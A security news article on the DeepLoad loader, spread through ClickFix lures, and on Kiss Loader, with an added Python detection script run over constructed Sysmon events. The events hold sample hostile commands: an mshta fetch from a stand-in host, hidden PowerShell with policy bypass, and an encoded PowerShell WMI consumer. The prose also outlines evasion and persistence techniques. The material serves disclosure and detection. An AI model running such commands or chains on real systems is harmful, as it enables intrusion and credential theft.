
The new campaign utilizes ClickFix social engineering tactics as a method to distribute a previously undocumented malware loader called DeepLoad.
“While likely using AI-assisted obfuscation and process injection to evade static scans, credential theft begins quickly, capturing passwords and sessions even if the primary loader is blocked,” ReliaQuest researchers Thassanai McCabe and Andrew Currie said in a report shared with The Hacker News.
The attack chain begins with a ClickFix lure: under the pretext of fixing a non-existent problem, the user is tricked into pasting a PowerShell command into the Windows Run dialog and executing it. The command uses ‘mshta.exe’, a legitimate Windows utility, to download and run an obfuscated PowerShell loader.
The loader has been found to hide its actual functionality behind meaningless variable assignments, presumably in an attempt to fool security tools. The attackers are credited with using artificial intelligence (AI) tools to develop the obfuscation layer.
DeepLoad blends into normal Windows activity and makes a deliberate effort to be unobtrusive. This involves hiding the payload inside an executable file named ‘LockAppHost.exe’, which is a legitimate Windows process that manages the lock screen.
Additionally, rather than relying on PowerShell’s built-in commands to launch processes and modify memory, the malware hides its tracks by disabling PowerShell command history and calling native Windows core functionality directly. Doing so bypasses common monitoring hooks that monitor PowerShell-based activity.
ReliaQuest said, “To avoid file-based detection, DeepLoad uses the built-in PowerShell feature Add-Type to generate a secondary component on the fly that compiles and executes code written in C#.” “This will generate a temporary dynamic link library (DLL) file and drop it into the user’s Temp directory.”
This provides a way for malware to evade filename-based detection, as the DLL is compiled and written with a randomized filename each time it is executed.
Another notable defense evasion tactic employed by DeepLoad is the use of asynchronous procedure call (APC) injection, which launches the target process in a suspended state, writes shellcode to memory, resumes execution of the process, and then executes the main payload within a trusted Windows process without writing the decoded payload to disk.
DeepLoad is designed to facilitate credential theft by extracting browser passwords from hosts. It also drops malicious browser extensions. This extension intercepts credentials entered on the login page and persists for the entire user session unless explicitly removed.
A more dangerous feature of this malware is its ability to automatically detect when a removable media device, such as a USB drive, is connected and copy malware-laced files using names such as “ChromeSetup.lnk”, “Firefox Installer.lnk”, and “AnyDesk.lnk”, causing infection when double-clicked.
“DeepLoad used Windows Management Instrumentation (WMI) to reinfect ‘clean’ hosts after three days without any user interaction or attacker interaction,” ReliaQuest explained. “WMI served two purposes: it broke the parent-child process chain that most detection rules were built to detect, and it created a WMI event subscription that would later silently re-execute the attack.”
The goal appears to be to deploy multipurpose malware that can perform malicious actions throughout the cyber kill chain, avoid writing artifacts to disk, infiltrate Windows processes, and quickly spread to other machines to evade detection by security controls.
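As an added illustration (not code from the ReliaQuest report or from this article), the Python below sketches host-based detection logic for the DeepLoad behaviours described above, run over constructed Sysmon-style events. Field names follow Sysmon's schema; every sample value, path and DLL name is invented for the example.

```python
# Constructed Sysmon-style events modelled on the behaviours described in the article.
# None of these values come from the report; they exist only to exercise the rules.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # ClickFix: the pasted command lands in the Run dialog history (RunMRU)
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": "mshta https://example.invalid/fix.hta"},
    # mshta.exe launching the obfuscated PowerShell loader
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c ..."},
    # Add-Type compiling C# into a randomly named DLL under the user's Temp directory
    {"EventID": 11, "Image": PS,
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\qz8k1p2r.dll"},
    # Re-execution via WMI: WmiPrvSE.exe replaces the expected parent process
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -enc AAAA"},
    # The WMI event consumer that re-runs the attack later (Sysmon event 20)
    {"EventID": 20, "Image": PS, "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell -enc AAAA"},
    # Benign activity that must not fire
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

def base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def rule_clickfix_runmru(e):
    # Registry value set under RunMRU whose data launches mshta or powershell
    return (e.get("EventID") == 13 and "\\runmru\\" in e.get("TargetObject", "").lower()
            and any(t in e.get("Details", "").lower() for t in ("mshta", "powershell")))

def rule_mshta_spawns_powershell(e):
    return (e.get("EventID") == 1 and base(e.get("ParentImage", "")) == "mshta.exe"
            and base(e.get("Image", "")) == "powershell.exe")

def rule_addtype_temp_dll(e):
    # powershell.exe creating a .dll inside %LOCALAPPDATA%\Temp (Add-Type artefact)
    t = e.get("TargetFilename", "").lower()
    return (e.get("EventID") == 11 and base(e.get("Image", "")) == "powershell.exe"
            and "\\appdata\\local\\temp\\" in t and t.endswith(".dll"))

def rule_wmi_spawned_shell(e):
    # Script host whose parent is WmiPrvSE.exe: the "broken" parent-child chain
    return (e.get("EventID") == 1 and base(e.get("ParentImage", "")) == "wmiprvse.exe"
            and base(e.get("Image", "")) in {"powershell.exe", "cmd.exe", "mshta.exe"})

def rule_wmi_commandline_consumer(e):
    # WMI consumer registered with a command line that invokes PowerShell
    return e.get("EventID") == 20 and "powershell" in e.get("Destination", "").lower()

RULES = {"clickfix_runmru": rule_clickfix_runmru,
         "mshta_spawns_powershell": rule_mshta_spawns_powershell,
         "addtype_temp_dll": rule_addtype_temp_dll,
         "wmi_spawned_shell": rule_wmi_spawned_shell,
         "wmi_commandline_consumer": rule_wmi_commandline_consumer}

def analyze(events):
    """Return (event index, rule name) for every event that matches a rule."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]
```

Each hit on its own is a weak signal; the chain of a RunMRU write, an mshta-to-PowerShell spawn, a Temp DLL drop and a WMI consumer on one host within a short window is what distinguishes this loader from routine administration.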
This disclosure comes after G DATA detailed another malware loader called Kiss Loader that is distributed through Windows Internet shortcut (.url) files attached to phishing emails. The shortcut connects to a remote WebDAV resource hosted on the TryCloudflare domain, which serves a second shortcut disguised as a PDF document.
Once that shortcut is executed, it launches a WSH script that runs the JavaScript component, which in turn retrieves and runs a batch script that displays the decoy PDF, sets persistence in the Startup folder, and downloads the Python-based Kiss Loader. In the final stage, the loader uses APC injection to decrypt and execute Venom RAT, a variant of AsyncRAT.
It is currently unknown how widespread attacks deploying Kiss Loader are and whether Kiss Loader is offered in a malware-as-a-service (MaaS) model. That said, the attackers behind Kiss Loader claim to be from Malawi.
